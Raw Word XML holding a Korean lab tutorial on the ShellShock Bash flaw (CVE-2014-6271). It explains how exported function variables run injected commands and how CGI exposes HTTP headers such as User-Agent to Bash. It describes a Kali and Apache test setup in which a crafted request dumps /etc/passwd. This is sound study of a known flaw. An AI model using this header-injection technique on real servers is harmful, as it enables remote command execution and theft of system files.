              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">test </w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>변수를 함수처럼 실행해보자</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D12A17" w14:textId="77777777" w:rsidR="00A24EE1" w:rsidRDefault="00A24EE1" w:rsidP="00F14072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0AB0263D" w14:textId="19951D6C" w:rsidR="00A24EE1" w:rsidRPr="00BE7966" w:rsidRDefault="00A24EE1" w:rsidP="00F14072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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9D90A6" wp14:editId="27355755">
                  <wp:extent cx="5320145" cy="1033145"/>
                  <wp:effectExtent l="0" t="0" r="0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72" cy="1033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072" w:rsidRPr="00BE7966" w14:paraId="63466C71" w14:textId="77777777" w:rsidTr="00C165CA">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="220DE8CA" w14:textId="3A34E313" w:rsidR="00A24EE1" w:rsidRDefault="00A24EE1" w:rsidP="00A24EE1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lastRenderedPageBreak/>
              <w:t>변수처럼 선언(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>test=’ ‘)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했음에도 함수처럼 동작하는 것을 확인할 수 있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이것은 취약점이라고 볼 수 있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상단에서 언급했던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CVE-2014-6271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ShellShock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취약점은 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>()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로 시작하는 변수가 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>subshell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이 실행되면 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>{ }</w:t>
            </w:r>
            <w:proofErr w:type="gram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부분이 함수로 인식되는데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그 이후에 나오는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>any command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가 실행이 되는 내용이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="777CD251" w14:textId="77777777" w:rsidR="00A24EE1" w:rsidRDefault="00A24EE1" w:rsidP="00C165C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795AD350" w14:textId="77777777" w:rsidR="00A24EE1" w:rsidRDefault="00A24EE1" w:rsidP="00C165C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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB74A46" wp14:editId="44642FD8">
                  <wp:extent cx="5367646" cy="1970946"/>
                  <wp:effectExtent l="0" t="0" r="5080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172" cy="1979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4C6E2" w14:textId="5EC0457E" w:rsidR="00A24EE1" w:rsidRDefault="00A24EE1" w:rsidP="00C165C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다음과 같이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export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로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>test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변수를 저장한 뒤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subshell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실행만 했을 뿐인데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pwd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, echo, ls -al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명령어가 모두 실행되는 것을 확인할 수 있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Bash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를 실행해서 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>subshell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이 실행했을 뿐인데 </w:t>
            </w:r>
            <w:r w:rsidR="00D47063">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>변수에 저장된 값들이었던 명령어들이 실행되</w:t>
            </w:r>
            <w:r w:rsidR="00D47063">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>는 것이다.</w:t>
            </w:r>
            <w:r w:rsidR="00D47063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="00D47063">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">이 취약점을 한 줄로 실행하기 위해서는 </w:t>
            </w:r>
            <w:r w:rsidR="00D47063">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash -c </w:t>
            </w:r>
            <w:r w:rsidR="00D47063">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>옵션을 사용하면 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FCD03C3" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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71376A29" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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2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. Bash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동작 원리</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F7F524C" w14:textId="357F6BDA" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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1번에서 확인할 수 있었던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bash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의 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>subprocess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만 실행시켜도 조작된 명령어가 실행되는 이유를 확인하기 위해서는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash Process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의 전체적인 동작과정을 이해할 필요가 있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다음과 같은 순서에 의해 동작한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68EF5C28" w14:textId="618DFF12" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Bash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실행 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5BD608" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Bash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환경변수 초기화</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714E115A" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Bash shell prompt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출력</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057C06A4" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4.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명령어 입력 대기 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240249D8" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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5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.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명령어 수행 시 명령어를 문자열로 저장하여 해당 문자열을 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>parsing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F85A9F" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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6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. parsing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된 구조체를 이용하여 명령어를 실행시킴</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB32C63" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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4A7AA887" w14:textId="7BD09164" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>hellShock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취약점과 연관된 부분은 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2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번이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Bash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는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>shell prompt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를 출력하기 전에 반드시 환경변수를 초기화하는데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이 과정에서 조작된 변수를 환경변수로 초기화해버리게 되고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이 과정에서 변수의 값으로 저장했던 명령어들을 실행하게 되는 것이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</w:p>
          <w:p w14:paraId="5CE61C36" w14:textId="77777777" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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여기서 더 큰 문제가 하나 있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지금까지 과정을 보면 공격자가 반드시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Shell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권한을 획득해야 가능하다고 생각할 수 있지만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b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ash subshell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을 실행할 때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{}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이후에 있는 코드가 실행되는 원리이기 때문에 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>shell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이 아니라 특정 프로그램 등을 이용하여 간접적으로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>subshell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을 실행시킬 수 있다면 이 취약점을 사용할 수 있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이 프로그램 중 하나가 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PHP-CGI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이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7543E073" w14:textId="77777777" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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1D9B2372" w14:textId="480695C3" w:rsidR="00D47063" w:rsidRDefault="00D47063" w:rsidP="00C165C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3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>. CGI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAC2897" w14:textId="6838EB88" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>GI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의 기본 개념은 P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HP-CGI Remote Code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에서 다뤘으니 개념은 지나치도록 한다. 동작과정은 다음과 같다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5084177F" w14:textId="00DA9F9E" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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1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.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사용자가 요청을 보낸다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2A1CD4" w14:textId="32BD28D2" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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2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.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웹서버가 사용자의 요청을 확인한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이때 사용자의 요청이 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>CGI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프로그램일 경우 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>CGI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를 실행시킨다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD3DF60" w14:textId="3193C86E" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>. CGI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가 실행되면 서버는 사용자의 브라우저가 읽을 수 있는 형태의 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>static html page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를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return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하게 되는데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웹서버가 그 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>static html page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를 사용자에게 전달해준다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7CF436" w14:textId="1F3DF832" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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4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.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사용자의 브라우저에서 응답으로 받은 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>static html page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를 읽는다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27675807" w14:textId="790E163D" w:rsidR="005E61B1" w:rsidRDefault="005E61B1" w:rsidP="00C165C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즉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static html page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에 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>header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까지 포함된 데이터가 작성되어야 한다는 의미이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따라서 모든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CGI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프로그램의 첫 부분에는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HTTP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헤더에 대한 정보가 들어간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="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>CGI</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">는 각각의 라인이 필드와 값으로 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>이뤄어져</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 있는데 각각의 필드는 변수로 저장된다.</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA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="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">즉 </w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>CGI</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">를 사용할 때 우리가 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>보게되는</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00ED62CA"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 w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HTTP Header</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">의 각 라인은 </w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>의 환경변수를 통해 접근이 가능한 것이다.</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA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="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">따라서 공격 시 </w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CGI </w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>스크립트를 요청하되,</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> User-Agent </w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>필드의 값 등을 수정해서 임의의 명령어가 실행되도록 조작한 후 요청하면,</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA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="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">취약한 </w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash</w:t>
            </w:r>
            <w:r w:rsidR="00ED62CA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>를 사용할 경우 그대로 적용되게 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20DA9F80" w14:textId="77777777" w:rsidR="00ED62CA" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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65718E20" w14:textId="341133D0" w:rsidR="00D47063" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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이를 확인하기 위하여 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali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에 간단한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test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환경을 구축해보겠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아파치 서버를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구동시킨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뒤 다음과 같이 설정한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="250B7111" w14:textId="76B8E4D4" w:rsidR="00ED62CA" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E9F217" wp14:editId="528C54BF">
                  <wp:extent cx="3051810" cy="2470150"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635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47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2E2F9B78" wp14:editId="6C9C1713">
                  <wp:extent cx="3526790" cy="2481074"/>
                  <wp:effectExtent l="0" t="0" r="0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021" cy="2502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6F9479" w14:textId="25369991" w:rsidR="00ED62CA" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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파일경로는 </w:t>
            </w:r>
            <w:r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usr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/lib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cgi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-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bin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이며</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>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확장자는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cgi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로 설정한다 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>(.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sh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>도 가능은 하다)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C8D5DD" w14:textId="77777777" w:rsidR="00D6576D" w:rsidRDefault="00D6576D" w:rsidP="00C165C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3AAE1489" w14:textId="000DDE4A" w:rsidR="00ED62CA" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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이를 타 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>pc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등에서 접속한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[kali </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ip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]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cgi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-bin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test.cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1A6C88F0" w14:textId="2FB75687" w:rsidR="00ED62CA" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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그럼 다음과 같이 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>cat 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etc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/passwd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결과값이 출력되게 된다.</w:t>
            </w:r>
            <w:r w:rsidR="00D6576D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</w:p>
          <w:p w14:paraId="55D44E48" w14:textId="77777777" w:rsidR="00ED62CA" w:rsidRDefault="00ED62CA" w:rsidP="00C165C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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A7C25B" wp14:editId="3B2E1F20">
                  <wp:extent cx="5343896" cy="3764280"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="762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2007" cy="3769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4F7628" w14:textId="63875679" w:rsidR="00D6576D" w:rsidRDefault="00D6576D" w:rsidP="00D657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앞서 언급했던 것처럼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명령어가 그대로 실행되게 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77ED3CE7" w14:textId="414BEFED" w:rsidR="00D6576D" w:rsidRPr="00D6576D" w:rsidRDefault="00D6576D" w:rsidP="00C165C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C165CA" w:rsidRPr="00BE7966" w14:paraId="595E4E69" w14:textId="77777777" w:rsidTr="00C165CA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78EA4070" w14:textId="181FDB74" w:rsidR="00C165CA" w:rsidRDefault="00C165CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="righ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lastRenderedPageBreak/>
              <w:t>실습 환경</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB6FED9" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRDefault="00C165CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="righ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공격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PC(Kali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linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>) :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
